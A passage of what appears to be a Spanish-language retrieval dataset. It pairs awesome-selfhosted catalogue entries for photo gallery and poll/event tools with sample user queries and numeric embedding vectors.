0.00848, 0.03799, -0.00118, -0.02664, 0.04088, 0.05467, 0.00977, -0.02253, 0.0195, 0.0567, -0.0608, -0.02075, 0.01057, 0.0374, 0.01068, 0.00051, 0.01066, -0.00128, 0.0227, 0.06306, 0.09249, -0.02786, 0.00456, -0.01459, -0.02388, 0.05433, -0.03457, 0.00721, -0.00594, -0.01403, -0.06233, -0.01788, -0.03706, 0.00897, -0.00042, -0.00325, -0.12075, -0.00646, 0.06457, 0.00307, -0.01997, -0.0621, -0.06468, -0.01401, -0.00585, 0.01148, -0.00809, -0.00104, 0.01515, -0.05427, -0.03786, -0.03143, -0.04114]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Photoview β€” Simple and user-friendly photo gallery for personal servers. It is made for photographers and aims to provide an easy and fast way to navigate directories, with thousands of high resolution photos [GPL-3.0, Go/Docker]. PiGallery 2 β€” Directory-first photo gallery website, with a rich UI, optimised for running on low resource servers [MIT, Docker/Nodejs]. Piwigo β€” Photo gallery software for the web, built by an active community of users and developers [GPL-2.0, PHP]. sigal β€” Yet another simple static gallery generator [MIT, Python]. SPIS β€” A simple, lightweight and fast media server with decent mobile support [GPL-3.0, Docker/Rust]. This week in past β€” Aggregates images taken this week, from previous years and presents them on a web page with a simple slideshow [MIT, Docker/Rust]. Thumbor β€” A smart imaging service and enables on-demand cropping, resizing, applying filters and optimizing images [MIT, Python/Docker]. Zenphoto β€” Open-source gallery and CMS project [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a los galeristas web tradicionales", "v": [0.13918, -0.00501, -0.10457, 0.04628, -0.08876, 0.04129, 0.09441, -0.09264, -0.06312, 0.02518, -0.0504, -0.14664, -0.1205, 0.10326, 0.12245, 0.02041, 0.0787, -0.07274, 0.20295, -0.03998, -0.12987, -0.00374, -0.1175, -0.07797, 0.00362, -0.18905, 0.0122, -0.07519, -0.09841, 0.0771, 0.0309, 0.01916, -0.00471, -0.11929, -0.02118, -0.01226, 0.10585, 0.03546, -0.0197, -0.12556, 0.02903, -0.13996, -0.0039, 0.00807, -0.06986, -0.14381, -0.07888, -0.03711, -0.06533, 0.05428, -0.04219, 0.01263, -0.03694, 0.05811, 0.07483, -0.10853, 0.10548, -0.07649, -0.09998, 0.01988, 0.01664, 0.11249, -0.0118, -0.01332, -0.0075, 0.03205, -0.04893, 0.04646, -0.0871, 0.03534, 0.08099, 0.03165, 0.03072, 0.00301, -0.11816, 0.06506, -0.06966, -0.01049, -0.0275, -0.00936, 0.0408, -0.07801, 0.0478, 0.07924, -0.04637, -0.07875, 0.02226, -0.16391, -0.01137, -0.01437, 0.10942, 0.02714, -0.01825, 0.0593, -0.0235, -0.18997, -0.00062, 0.09103, 0.03897, 0.05455, 0.02829, 0.04161, -0.08459, -0.03779, 0.08356, -0.04681, 0.03828, 0.04578, -0.07742, 0.01606, -0.02682, 0.06462, -0.02816, 0.04695, -0.00209, 0.03534, -0.04467, 0.00266, 0.02727, 0.00512, -0.0428, -0.0135, -0.02935, -0.02688, -0.01257, 0.02525, 0.00715, 0.07755, -0.03358, 0.00983, 0.01134, -0.02227, -0.05158, -0.05031, -0.09956, -0.02533, 0.06868, -0.05816, 0.07105, 0.00832, -0.00035, 0.01021, 0.00489, -0.05752, 0.04028, -0.05602, 0.02252, -0.02535, -0.05991, -0.05717, -0.15415, 0.02308, 0.03564, 0.10629, -0.01055, 0.02817, -0.13067, -0.06498, -0.02802, 0.09534, -0.00971, -0.01427, 0.0706, 1e-05, -0.09042, 0.02634, -0.07544, -0.04019, -0.05731, 0.00084, 0.03555, 0.06058, -0.00633, -0.05485, 0.07237, 0.0029, -0.07107, -0.13803, 0.12899, -0.03981, -0.01549, 0.03487, -0.09808, -0.00349, -0.00885, -0.05499, 0.00918, 0.01742, -0.01568, 0.04427, -0.02943, -0.00136, -0.11203, -0.04182, -0.00373, 0.05603, -0.00502, -0.03393, -0.03701, -0.01753, -0.06095, -0.00917, -0.02082, -0.06544, -0.0355, 0.02784, -0.04577, -0.00692, 0.00382, 0.06787, 0.03922, -0.00393, 0.05313, -0.06858, -0.02999, 0.01332, 0.00857, -0.09453, -0.03501, -0.01228, 0.06131, 0.02083, 0.03689, 0.02761, 9e-05, 0.04895, 0.04744, 0.06543, -0.04947, 0.00848, 0.01338, 0.00223, -0.03672, -0.00802, 0.03834, 0.00076, 0.0128, -0.02014, -0.06589, 0.00839, 0.05608, 0.056, -0.03525, 0.04643, 0.01233, -0.0294, -0.11715, -0.02125, -0.00347, -0.05197, -0.03953, 0.08808, 0.00354, -0.00221, 0.00305, 0.00181]} -{"tipo": "pregunta", "herramienta": "Photo Galleries", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Photo Galleries", "tema": "photo galleries", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Photo Galleries: Photoview β€” Simple and user-friendly photo gallery for personal servers. It is made for photographers and aims to provide an easy and fast way to navigate directories, with thousands of high resolution photos [GPL-3.0, Go/Docker]. PiGallery 2 β€” Directory-first photo gallery website, with a rich UI, optimised for running on low resource servers [MIT, Docker/Nodejs]. Piwigo β€” Photo gallery software for the web, built by an active community of users and developers [GPL-2.0, PHP]. sigal β€” Yet another simple static gallery generator [MIT, Python]. SPIS β€” A simple, lightweight and fast media server with decent mobile support [GPL-3.0, Docker/Rust]. This week in past β€” Aggregates images taken this week, from previous years and presents them on a web page with a simple slideshow [MIT, Docker/Rust]. Thumbor β€” A smart imaging service and enables on-demand cropping, resizing, applying filters and optimizing images [MIT, Python/Docker]. Zenphoto β€” Open-source gallery and CMS project [GPL-2.0, PHP].", "indexar": "con que puedo crear una galerΓ­a de imΓ‘genes ligera y rΓ‘pida", "v": [0.05374, 0.06055, -0.15811, -0.05095, -0.0447, -0.11039, -0.05234, 0.13794, -0.02924, -0.17138, 0.08705, -0.16404, -0.02375, -0.07317, 0.13732, 0.03186, -0.08375, -0.01146, 0.00895, -0.09216, 0.02425, 0.14945, -0.09833, -0.1018, -0.01939, -0.1833, 0.1174, -0.02325, -0.06808, 0.02232, -0.07242, 0.11183, 0.06144, 0.0434, -0.06356, -0.08131, 0.09534, -0.0452, -0.06981, 0.03308, 0.02658, 0.05988, -0.0076, 0.05838, -0.03923, -0.05233, -0.00552, 0.01431, -0.04775, 0.04359, 0.03725, 0.1203, -0.10334, 0.03231, -0.06758, -0.16821, 0.10397, -0.06748, -0.00418, 0.02738, 0.07153, 0.15852, -0.04755, -0.00021, -0.07041, 0.10004, -0.04814, -0.04135, -0.08121, -0.01631, 0.0556, 0.02081, 0.02534, -0.01131, -0.04347, 0.03055, -0.19211, -0.069, -0.14391, -0.02469, 0.00236, -0.00523, -0.00823, -0.03796, -0.12003, -0.07232, -0.06003, -0.00622, 0.03632, -0.09482, 0.05827, -0.00543, 0.06182, 0.03054, 0.04875, 0.02758, -0.00284, 0.03716, 0.02596, 0.02488, 0.0058, -0.05704, -0.12817, 0.02179, 0.03702, 0.00355, 0.08367, -0.04055, -0.10676, -0.07751, 0.0681, -0.02411, 0.01154, -0.02909, -0.03184, 0.00869, -0.0465, -0.01449, -0.02153, 0.02897, 0.03751, -0.09079, 0.02842, 0.00441, -0.01224, 0.01084, -0.01764, 0.04612, -0.09901, 0.0065, -0.06996, 0.05276, -0.05705, -0.11887, -0.03655, 0.03514, 0.00648, -0.02714, 0.01537, -0.04797, -0.01211, 0.02555, 0.028, -0.10673, -0.05232, -0.00627, -0.02982, -0.11645, -0.0672, 0.04479, 0.02159, 0.01337, 0.06191, -0.01082, 0.00805, 0.05139, -0.01638, -0.02704, 0.01211, -0.03019, -0.03599, 0.09356, 0.09086, 0.06224, -0.06296, -0.0572, -0.1328, -0.08754, -0.05154, 0.04396, -0.03907, -0.04561, -0.08837, -0.02047, 0.09999, 0.03882, -0.02223, -0.07855, -0.01432, -0.00837, 0.00167, 0.00285, -0.02386, 0.03926, -0.00357, -0.06611, 0.01032, 0.05597, -0.0077, 0.03798, -0.01415, 0.04162, 0.00027, 0.0175, 0.0298, -0.02707, -0.01384, 0.01335, 0.01666, -0.04921, -0.02719, -0.08083, -0.01242, -0.01617, -0.02536, -0.04202, -0.04305, 0.12152, -0.02387, -0.02232, 0.02724, 0.05279, 0.04121, -0.10211, -0.00418, 0.03119, 0.03231, -0.05606, -0.02839, -0.02369, 0.0484, 0.06946, 0.01351, 0.13343, 0.01495, 0.05213, -0.04435, 0.00162, -0.00578, -0.02563, 0.01058, 0.07722, -0.04085, -0.06848, 0.06373, -0.01148, 0.00867, -0.01362, -0.05068, -0.01522, 0.05433, 0.00416, -0.0493, 0.06106, -0.00196, 0.0036, -0.04639, -0.00977, 0.00361, -0.12698, 0.02235, 0.06073, 0.06363, -0.05366, 0.00565, 0.00304]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Bitpoll β€” Conduct polls about dates, times or general questions [GPL-3.0, Docker/Python]. Bracket β€” Flexible tournament system to build a tournament setup, add teams, schedule matches, keep track of scores and present ranking live to the public [AGPL-3.0, Docker/Nodejs]. Christmas Community β€” Create a simple place for your entire family to use to find gifts that people want, and to avoid double-gifting [AGPL-3.0, Docker/Nodejs]. Claper β€” The ultimate tool to interact with your audience (alternative to Slido, AhaSlides and Mentimeter) [GPL-3.0, Elixir/Docker]. ClearFlask β€” Community-feedback tool for managing incoming feedback and prioritizing a public roadmap (alternative to Canny, UserVoice, Upvoty) [AGPL-3.0, Docker]. docassemble β€” A free, open-source expert system for guided interviews and document assembly, based on Python, YAML, and Markdown [MIT, Docker/Python]. EventSchedule β€” Share events, sell tickets, and bring communities together [AAL, PHP/Docker].", "indexar": "ΒΏcon quΓ© puedo organizar votaciones sobre fechas y horarios?", "v": [0.00332, 0.15909, -0.03757, 0.01021, 0.03551, -0.06329, 0.15847, -0.07879, -0.0606, -0.21371, -0.14415, -0.17785, 0.11414, 0.01004, 0.0374, 0.04591, 0.16297, -0.06469, 0.04329, 0.0488, -0.0808, -0.05573, 0.0162, 0.11017, -0.04266, -0.1011, 0.16364, 0.05156, -0.11301, -0.06937, 0.00644, -0.11176, 0.06225, -0.01544, 0.13002, 0.12176, 0.09665, 0.17058, -0.09087, -0.02585, -0.10438, 0.07182, -0.04055, -0.04296, 0.09536, -0.07749, -0.06383, 0.14731, -0.07565, -0.14464, -0.04436, -0.00104, 0.10112, 0.0587, -0.02345, -0.05294, -0.0545, -0.087, -0.01002, 0.01087, 0.04738, -0.00609, 0.05912, 0.06444, 0.02437, 0.10086, -0.07611, 0.02041, 0.06865, 0.09123, -0.16637, -0.086, 0.00035, 0.06216, 0.01217, 0.06559, 0.02604, 0.00935, -0.01111, -0.04626, 0.03014, 0.01856, -0.06374, 0.06009, -0.00575, 0.12337, 0.0137, -0.00571, -0.04392, -0.08231, 0.01341, 0.03875, 0.08422, -0.00391, -0.01009, -0.02918, 0.01541, -0.00687, 0.02108, 0.02786, -0.06259, -0.03883, -0.01728, 0.06283, -0.04195, 0.02093, 0.01504, 0.0535, 0.0362, -0.00361, -0.0478, 0.05581, -0.15739, -0.05527, 0.0578, -0.03829, 0.02055, 0.02802, -0.00717, 0.03027, 0.05523, 0.05163, 0.03662, -0.01541, 0.04478, 0.03168, 0.14678, 0.06723, -0.02716, 0.03572, -0.05796, 0.02505, -0.05835, 0.00321, -0.02102, 0.02262, -0.07191, 0.02096, 0.05206, -0.02794, -0.01088, 0.05687, -0.02169, -0.05292, 0.09466, -0.00624, -0.00699, -0.06648, -0.06325, -0.0175, 0.02886, -0.05791, 0.06347, 0.04721, 0.00663, 0.00776, -0.02399, -0.09516, -0.03152, -0.00521, -0.04204, 0.02624, -0.06228, -0.06855, 0.08073, -0.08065, -0.02581, 0.02241, -0.05857, 0.07882, 0.04856, 0.1109, -0.01118, -0.02475, -0.01373, -0.07816, -0.03325, -0.00601, 0.047, -0.01915, 0.04012, 0.07144, 0.00686, -0.00531, -0.01664, -0.02225, 0.04441, -0.01716, -0.03468, -0.03729, 0.0357, -0.03262, 0.07818, -0.01803, -0.00746, -0.01862, 0.04272, -0.02734, -0.01897, 0.00726, -0.04985, -0.02617, 0.03415, 0.04053, 0.05419, 0.02528, -0.07998, 0.07939, 0.03687, 0.06166, 0.05267, 0.04489, 0.04951, -0.00416, -0.09086, 0.0169, 0.02911, -0.03156, -0.02328, -0.06079, -0.04202, 0.04288, 0.04313, -0.05177, 0.01336, -0.01447, 0.07219, 0.01049, 0.11645, 0.03532, 0.02195, 0.03637, 0.0189, -0.01641, 0.00153, -0.04072, 0.05326, 0.00146, -0.02287, -0.00958, 0.0297, 0.03627, -0.02141, -0.06463, -0.07868, -0.04168, -0.03769, 0.02999, -0.05864, -0.03656, -0.03578, 0.01843, 0.0324, -0.06759, 0.02804, -0.02573]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Bitpoll β€” Conduct polls about dates, times or general questions [GPL-3.0, Docker/Python]. Bracket β€” Flexible tournament system to build a tournament setup, add teams, schedule matches, keep track of scores and present ranking live to the public [AGPL-3.0, Docker/Nodejs]. Christmas Community β€” Create a simple place for your entire family to use to find gifts that people want, and to avoid double-gifting [AGPL-3.0, Docker/Nodejs]. Claper β€” The ultimate tool to interact with your audience (alternative to Slido, AhaSlides and Mentimeter) [GPL-3.0, Elixir/Docker]. ClearFlask β€” Community-feedback tool for managing incoming feedback and prioritizing a public roadmap (alternative to Canny, UserVoice, Upvoty) [AGPL-3.0, Docker]. docassemble β€” A free, open-source expert system for guided interviews and document assembly, based on Python, YAML, and Markdown [MIT, Docker/Python]. EventSchedule β€” Share events, sell tickets, and bring communities together [AAL, PHP/Docker].", "indexar": "necesito una herramienta para montar torneos con resultados en vivo", "v": [0.10337, -0.01745, -0.23907, -0.14105, -0.01448, -0.04644, -0.04088, 0.00873, 0.00292, -0.16531, -0.03645, -0.01802, 0.10466, 0.00714, 0.07385, 0.11628, 0.09258, -0.15067, 0.18272, 0.05263, -0.06158, -0.09956, -0.15166, -0.07234, 0.02527, -0.04977, 0.05368, -0.06584, -0.18153, 0.10214, -0.03553, 0.05658, 0.06661, -0.06638, -0.02316, -0.1623, 0.01585, 0.00328, -0.089, 2e-05, -0.05189, -0.0024, -0.10319, -0.01273, -0.02903, -0.00638, -0.02723, -0.01663, -0.02817, -0.00802, 0.18129, -0.00525, -0.04326, -0.11306, -0.04607, -0.16394, 0.10572, -0.12482, 0.04313, -0.12825, -0.10134, -0.03725, 0.00675, 0.08726, -0.0354, 0.04438, 0.05775, -0.07073, 0.01887, 0.05633, -0.08985, 0.0339, 0.02994, 0.06927, -0.08783, 0.06106, 0.08617, 0.0047, -0.04491, 0.06314, 0.03405, -0.02656, -0.01366, 0.078, -0.13637, -0.08209, 0.09366, 0.00662, 0.06875, -0.12741, -0.05093, -0.00416, 0.01171, 0.05889, -0.0312, -0.11816, 0.06639, 0.04397, -0.01106, -0.04148, 0.06857, 0.0314, -0.04516, -0.01166, -0.05231, -0.05645, -0.00189, -0.06126, -0.07171, 0.07804, 0.08605, 0.00591, -0.05327, 0.05762, 0.01214, 0.05858, -0.0575, 0.00856, 0.016, -0.0165, -0.04881, 0.11983, -0.02041, -0.02545, -0.06712, -0.02713, 0.01403, 0.03935, -0.01205, -0.08151, 0.05145, -0.03039, -0.11632, 0.0322, 0.01212, 0.04135, 0.04618, -0.02086, -0.02457, 0.03505, -0.04507, 0.01931, -0.06148, -0.1982, 0.01896, 0.05351, -0.01229, -0.03027, -0.04788, 0.00288, 0.07535, 0.01126, 0.05876, 0.01862, -0.02513, -0.06574, -0.02545, 0.00712, -0.0312, 0.01844, -0.04959, -0.04371, 0.00184, -0.01958, -0.00305, -0.00923, 0.05012, 0.03519, 0.0566, 0.03345, 0.02014, 0.00148, 0.03578, -0.02948, 0.02947, 0.02195, -0.03673, 0.03019, -0.06588, -0.12294, -0.00102, 0.02556, -0.0457, -0.04189, -0.09615, 0.01245, 0.06482, 0.01778, -0.02122, 0.03349, 0.06289, 0.07861, -0.05497, -0.03363, 0.11264, 0.04722, 0.05772, -0.08984, -0.01501, -0.089, 0.00555, -0.01419, -0.01156, -0.02979, 0.02727, 0.02864, -0.05152, 0.03616, 0.0498, 0.04017, -0.00743, -0.01098, 0.00683, -0.02253, 0.01709, 0.01214, 0.0005, -0.01431, 0.00016, 0.03169, 0.00811, -0.02669, -0.00284, -0.01777, 0.05278, -0.00145, -0.00953, 0.00296, 0.04472, -0.02631, 0.02165, -0.04676, -0.03197, 0.05186, 0.03623, -0.0188, 0.06537, -0.0108, -0.00891, 0.03404, -0.00601, 0.00447, 0.04588, -0.01848, 0.00183, -0.0246, -0.03709, -0.04792, -0.03771, -0.08271, -0.01205, 0.02725, -0.00059, -0.02897, -0.02279, 0.01077]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Bitpoll β€” Conduct polls about dates, times or general questions [GPL-3.0, Docker/Python]. Bracket β€” Flexible tournament system to build a tournament setup, add teams, schedule matches, keep track of scores and present ranking live to the public [AGPL-3.0, Docker/Nodejs]. Christmas Community β€” Create a simple place for your entire family to use to find gifts that people want, and to avoid double-gifting [AGPL-3.0, Docker/Nodejs]. Claper β€” The ultimate tool to interact with your audience (alternative to Slido, AhaSlides and Mentimeter) [GPL-3.0, Elixir/Docker]. ClearFlask β€” Community-feedback tool for managing incoming feedback and prioritizing a public roadmap (alternative to Canny, UserVoice, Upvoty) [AGPL-3.0, Docker]. docassemble β€” A free, open-source expert system for guided interviews and document assembly, based on Python, YAML, and Markdown [MIT, Docker/Python]. EventSchedule β€” Share events, sell tickets, and bring communities together [AAL, PHP/Docker].", "indexar": "que programa sirve para crear un espacio donde toda la familia encuentre regalos sin duplicados?", "v": [-0.00611, -0.0267, -0.1708, -0.12678, -0.06766, -0.11065, 0.05029, 0.01896, -0.05267, -0.11904, -0.05767, -0.15921, -0.02752, -0.15181, -0.02612, -0.09974, 0.10042, 0.01191, 0.06296, 0.07063, -0.00367, -0.01451, -0.06964, -0.08722, -0.04609, -0.17483, 0.07186, -0.02756, -0.11577, 0.14971, 0.10507, 0.01309, 0.02408, -0.12761, -0.00461, -0.05471, 0.06984, 0.0072, -0.05396, -0.04326, 0.06218, 0.07273, -0.08954, 0.06261, -0.16091, 0.02101, 0.05169, 0.04809, -0.07182, -0.00314, -0.13079, -0.09098, 0.00322, -0.05929, 0.06831, -0.07538, 0.03983, -0.17775, -0.05814, 0.03278, -0.10956, 0.05359, 0.10655, -0.04052, -0.02113, 0.00505, 0.02456, -0.0161, -0.06962, -0.05571, -0.08601, -0.00847, 0.08577, -0.045, -0.03555, -0.00806, -0.0122, -0.07576, 0.03128, 0.00036, 0.07534, 0.02157, -0.02646, 0.00788, 0.07669, -0.03718, 0.00608, 0.1083, 0.03892, -0.07172, -0.00732, 0.03339, 0.0654, 0.08876, 0.00316, 0.00212, 0.11242, -0.01734, -0.00217, 0.14451, 0.0932, -0.07538, -0.1391, 0.07602, -0.10982, 0.08427, 0.0814, 0.01604, -0.06752, -0.05705, 0.01201, -0.00391, 0.02996, -0.06398, -0.09269, 0.03552, 0.05413, -0.02498, 0.04131, 0.03786, -0.10672, 0.03726, -0.01144, 0.02441, -0.09378, -0.01033, -0.02169, -0.01798, -0.02699, 0.06789, 0.01102, 0.06229, 0.01043, -0.01653, -0.06478, -0.13207, -0.06117, -0.00711, -0.05555, -0.03758, 0.11493, 0.0752, 0.03545, 0.01281, 0.00519, 0.06226, 0.00487, -0.07264, 0.00067, 0.0917, -0.12008, 0.04413, 0.03114, 0.04773, -0.04273, 0.01249, -0.02751, -0.05061, -0.00656, 0.00187, -0.05076, 0.03363, -0.00552, 0.01675, 0.06787, -0.02664, -0.03716, -0.0497, 0.05378, 0.00358, -0.11782, 0.03655, 0.00134, -0.04827, 0.00012, -0.08477, 0.06943, -0.02711, -0.00915, -0.0101, -0.11456, 0.03099, -0.0273, 0.02876, -0.02367, -0.05517, 0.03898, 0.04888, 0.01635, 0.0391, -0.03066, -0.02374, -0.00408, -0.01601, -0.02458, -0.06816, -0.01885, -0.02497, 0.09866, 0.02246, -0.03668, -0.00671, 0.01953, -0.03654, 0.04547, 0.07501, -0.0029, -0.00196, -0.00593, 0.12834, -0.0186, -0.0766, 0.05992, 0.03772, -0.07155, 0.04931, 0.01482, 0.00111, 0.11971, 0.07243, 0.04631, 0.04639, -0.05965, -0.00081, -0.00756, 0.0023, 0.03601, 0.03018, 0.06333, -0.00598, -0.00641, -0.02299, 0.03336, 0.00017, 0.0066, 0.01527, 0.00727, -0.027, 0.03755, -0.05387, 0.04088, 0.05527, -0.03285, 0.01149, -0.05099, -0.03591, -0.0588, 0.05396, 0.04492, -0.04766, -0.03552, 0.03699, -0.00387, -0.09861, 0.01231, 0.00675]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Fider β€” Open platform to collect and prioritize feedback (alternative to UserVoice) [MIT, Docker]. Formbricks β€” Experience Management Suite built on the largest open source survey stack worldwide. Gracefully gather feedback at every step of the customer journey to know what your customers need [AGPL-3.0, Nodejs/Docker]. Framadate β€” Online service for planning an appointment or make a decision quickly and easily: Make a poll, Define dates or subjects to choose, Send the poll link to your friends or colleagues, Discuss and make a decision [CECILL-B, PHP]. Gancio β€” Local community event and agenda sharing [AGPL-3.0, Nodejs]. gathio β€” Self-destructing, shareable, no-registration event pages [GPL-3.0, Nodejs/Docker]. HeyForm β€” Form builder that allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls [AGPL-3.0, Docker]. hitobito β€” Manage complex group hierarchies with members, events and a lot more [AGPL-3.0, Ruby].", "indexar": "cual es una alternativa libre a UserVoice para recopilar opiniones?", "v": [-0.11953, 0.09167, -0.15709, -0.00826, -0.03962, -0.07648, 0.01714, -0.16082, -0.03974, -0.21253, 0.085, -0.27121, 0.00136, 0.10837, 0.05696, -0.06195, 0.14084, 0.00221, 0.12988, 0.05584, 0.02784, 0.0458, -0.15171, -0.04244, -0.00031, -0.01526, -0.04488, -0.02265, 0.0344, 0.00514, 0.03164, -0.06826, 0.01909, 0.00546, -0.00901, -0.0171, 0.12024, 0.07151, 0.08033, 0.04254, 0.04903, -0.04965, -0.1153, 0.0922, -0.00758, -0.05227, -0.04364, 0.08424, 0.02201, 0.06485, -0.03524, -0.0553, -0.08081, 0.04767, 0.11126, -0.0037, 0.13146, -0.08885, -0.04449, 0.00885, -0.05546, 0.07898, 0.11233, 0.00449, 0.04118, 0.06177, 0.02685, -0.0535, -0.04984, 0.09485, 0.00953, 0.12764, 0.07885, -0.11246, -0.07211, 0.0839, -0.00583, -0.06415, -0.00645, 0.0128, 0.09064, -0.1226, -0.0079, -0.01425, -0.04358, -0.04934, 0.166, -0.15015, 0.00657, 0.11222, 0.02215, -0.03671, -0.00883, 0.02767, 0.055, -0.07001, 0.06547, 0.14312, -0.01988, 0.09868, 0.06279, 0.03142, -0.04544, 0.01318, -0.04989, 0.02052, -0.04531, -0.02241, -0.06013, -0.0457, 0.0194, 0.06779, 0.04572, 0.02972, 0.02497, -0.06047, -0.06474, -0.02682, -0.00335, 0.00276, 0.01026, 0.0381, -0.06407, -0.19833, 0.07117, 0.058, 0.07825, -0.01246, -0.07261, -0.01043, 0.02472, -0.04674, -0.00672, -0.11109, -0.04411, -0.08281, 0.05454, 0.01316, -0.03075, 0.01824, -0.00318, 0.04492, 0.01199, -0.04404, 0.05132, -0.11223, -0.03182, -0.03364, -0.01017, -0.04951, -0.01409, 0.01388, -0.00924, 0.06063, 0.00525, 0.02608, -0.05527, -0.00094, -0.07778, 0.06995, 0.06836, -0.0786, 0.04659, -0.03114, -0.04254, -0.04654, 0.00876, -0.02929, -0.07475, -0.03394, 0.07008, 0.04153, 0.04182, -0.04765, 0.01254, -0.05251, 0.00357, -0.07423, 0.00744, -0.00987, -0.01401, -0.03009, -0.0677, 0.00486, -0.00329, -0.02857, 0.02023, 0.05441, 0.0508, -0.00578, -0.05603, 0.00911, 0.00064, -0.08465, 0.00325, -0.01794, 0.04468, -0.08641, -0.03085, -0.02807, -0.08335, -0.02043, -0.03515, -0.00823, -0.00294, -0.00562, -0.05688, 0.02111, 0.04675, 0.03635, 0.01819, 0.02086, 0.04936, -0.00117, -0.02752, 0.00375, 0.01958, -0.03914, -0.03752, -0.0611, -0.0193, 0.04233, 0.01406, 0.01546, -0.04319, 0.03661, 0.05734, 0.05289, 0.03372, 0.03958, 0.03218, 0.02427, -0.02286, 0.01477, -0.00125, 0.02216, -0.01959, 0.07739, 0.02963, -0.04904, 0.06703, 0.05753, -0.08621, -0.02301, -0.03892, -0.0075, -0.02831, 0.00441, -0.07814, -0.05863, -0.04456, 0.0589, 0.03874, -0.00701, 0.02286, 0.00823]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Fider β€” Open platform to collect and prioritize feedback (alternative to UserVoice) [MIT, Docker]. Formbricks β€” Experience Management Suite built on the largest open source survey stack worldwide. Gracefully gather feedback at every step of the customer journey to know what your customers need [AGPL-3.0, Nodejs/Docker]. Framadate β€” Online service for planning an appointment or make a decision quickly and easily: Make a poll, Define dates or subjects to choose, Send the poll link to your friends or colleagues, Discuss and make a decision [CECILL-B, PHP]. Gancio β€” Local community event and agenda sharing [AGPL-3.0, Nodejs]. gathio β€” Self-destructing, shareable, no-registration event pages [GPL-3.0, Nodejs/Docker]. HeyForm β€” Form builder that allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls [AGPL-3.0, Docker]. hitobito β€” Manage complex group hierarchies with members, events and a lot more [AGPL-3.0, Ruby].", "indexar": "con que puedo montar un sistema de encuestas y gestiΓ³n de la experiencia del cliente?", "v": [0.10693, 0.11838, -0.06492, -0.16797, -0.04746, 0.00756, -0.04845, 0.01208, -0.13327, -0.20088, -0.12944, 0.04868, 0.02036, -0.03587, 0.04793, 0.0773, 0.07925, -0.03836, 0.07319, 0.04147, -0.00283, -0.09624, -0.02328, -0.01125, -0.11717, 0.06247, 0.02488, -0.18448, -0.00219, 0.06097, 0.05018, -0.0044, -0.0256, -0.0024, 0.02391, -0.03508, -0.0202, 0.11428, 0.09123, -0.05483, 0.05338, -0.09313, -0.02999, -0.01233, 0.08069, -0.05874, -0.00272, -0.05697, 0.01541, -0.08088, -0.11737, -0.0951, -0.18673, -0.03475, 0.0491, -0.01938, 0.04916, -0.03124, 0.17147, -0.04588, -0.00135, 0.07541, 0.05485, 0.15481, 0.07327, -0.01363, 0.09455, -0.0573, -0.0145, 0.03027, -0.0287, 0.02895, -0.01551, 0.03589, 0.01367, 0.02432, 0.09408, 0.06475, -0.01167, 0.0123, 0.03142, -0.01771, -0.1113, 0.10338, -0.05084, -0.06381, -0.00766, -0.08984, -0.00434, 0.04202, 0.02532, -0.03364, 0.01729, 0.02818, -0.06908, -0.07264, 0.09074, -0.02745, 0.02645, 0.00038, -0.04479, -0.0275, -0.02888, 0.13832, 0.02009, 0.01864, 0.09178, -0.12755, -0.0036, -0.03424, -0.02318, 0.03259, -0.07931, -0.01244, -0.0891, -0.08643, 9e-05, 0.02957, -0.02925, -0.03868, -0.02251, 0.09917, 0.03251, -0.03884, 0.01165, -0.01324, 0.09543, 0.08053, 0.03011, 0.00341, 0.03042, 0.00904, -0.07675, 0.03723, 0.08357, -0.03326, 0.01348, 0.05752, 0.01574, -0.06053, -0.07898, 0.09783, 0.00955, -0.09854, 0.13667, 0.00093, 0.04376, -0.10952, 0.02968, 0.01321, -0.0232, 0.06, 0.03342, 0.02272, -0.06631, -0.09643, 0.06602, -0.07906, 0.00142, 0.04422, -0.02074, 0.01572, 0.02905, 0.10434, 0.02948, 0.01052, -0.02948, -0.06501, 0.12424, -0.00755, -0.04014, 0.05293, -0.00135, -0.00721, 0.11656, 0.0498, -0.04083, -0.05943, 0.00136, -0.01427, -0.00642, 0.03278, 0.01529, 0.02432, 0.0393, 0.00503, -0.01706, 0.00019, -0.00582, 0.03585, 0.02866, -0.01338, 0.01661, 0.03943, 0.06282, -0.03246, 0.03053, 0.00992, -0.05525, 0.01854, -0.09712, 0.02657, 0.00606, -0.05232, -0.06693, 0.04867, -0.00571, 0.14761, 0.07757, 0.04688, 0.07071, -0.06772, 0.0462, -0.07038, -0.0131, 0.00625, 0.02879, -0.00921, -0.04071, -0.00614, 0.01335, 0.03885, 0.06933, 0.05759, -0.04308, 0.00718, 0.01937, 0.05585, 0.06884, 0.00891, 0.02615, -0.06604, 